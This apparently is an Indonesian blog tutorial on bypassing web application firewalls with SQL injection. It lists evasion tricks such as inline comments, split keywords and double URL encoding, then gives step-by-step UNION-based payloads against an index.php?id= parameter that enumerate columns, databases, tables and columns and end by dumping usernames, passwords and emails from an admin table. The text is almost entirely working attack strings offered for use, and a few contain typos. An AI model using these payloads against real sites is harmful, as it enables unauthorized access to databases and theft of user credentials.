Banyak cara yang dilakukan oleh injector untuk membypass security dari WAF ini.
Yakni dengan perintah - perintah yang akan melewati hadangan dari WAF.
Contoh - contoh perintah tersebut yakni :
Code : //, — , /**/, #, –+, — -, ;
1. Inline Comments
code : id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
2. Buffer Overflow:/Unexpected input:
code : id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33,34,35,36–+
3. Replaced keywords(preg_replace and/or WAF’s with the same action):
code : id=1+UNIunionON+SeLselectECT+1,2,3–
4. Charachter encoding:
code : id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users–+
-------------------------------------------------
Oke. berikut ini contoh - contoh serangan untuk membypass WAF tersebut ..
1. perintah order kolom :
index.php?id=1 order by 10-- Error
index.php?id=1 order by 9-- Error
index.php?id=1 order by 8-- Error
index.php?id=1 order by 7-- Error
index.php?id=1 order by 6-- Error
index.php?id=1 order by 5-- True
or :
index.php?id=1/**/order/**/by/**/10/*
index.php?id=1/**/order/**/by/**/9/*
index.php?id=1/**/order/**/by/**/8/*
index.php?id=1/**/order/**/by/**/7/*
index.php?id=1/**/order/**/by/**/6/*
index.php?id=1/**/order/**/by/**/5/*
2. perintah valid string
index.php?id=-1 union select 1,2,3,4,5--
index.php?id=-1/**/union/**/select/**/1,2,3,4,5--
index.php?id=-1+un/**/ion+sel/**/ect+1,2,3—
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--
or :
index.php?id=-1/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—
3. User, versi, data direktori, dsb :
index.php?id=-1 union select 1,2,database(),4,5--
index.php?id=-1 union select 1,2,user(),4,5--
index.php?id=-1 union select 1,2,version(),4,5--
index.php?id=-1 union select 1,2,@@datadir,4,5--
Cara menggabungkan :
index.php?id=-1 union select 1,2,group_concat(database(),0x3a,user(),0x3a,version()),4,5--
4. Lihat semua table :
index.php?id=-1 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where tables_schema=database()--
index.php?id=-1/**/union/**/select/**/1,2,group_concat(table_name),4,5/**/from/**/information_schema.tables/**/where/**/tables_schema=database()--
index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
5. Lihat semua database :
index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
or:
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
6. Sekarang kita akan liat kolom dari table yang kita inginkan :
index.php?id=-1 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e
index.php?id=-1/**/ union/**/select/**/1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e
index.php?id=-1+/*!UNION*/+/*!SELECT*+1,2,GROUP_CONCAT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e
index.php?id=-1+/*!UNION*
/+/*!SELECT*+1,2,GrOUp_COnCaT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e
7. Langkah terakhir:
index.php?id=-1 union select 1,2,group_concat(user,0x3a,password),4,5 from admin--
index.php?id=-1/**/union/**/select/**/1,2,group_concat(user,0x3a,password),4,5 from admin--
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin—
index.php?id=-1+un/**/ion+sel/**/ect+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin—
Untuk Prof Of Concept silahkan kawan - kawan semua kembangan ketika melakukan injeksi.
Akan tetapi untuk prof of concepnya saya juga akan buat tutorialnya nanti
Salam ..
Sign up here with your email
ConversionConversion EmoticonEmoticon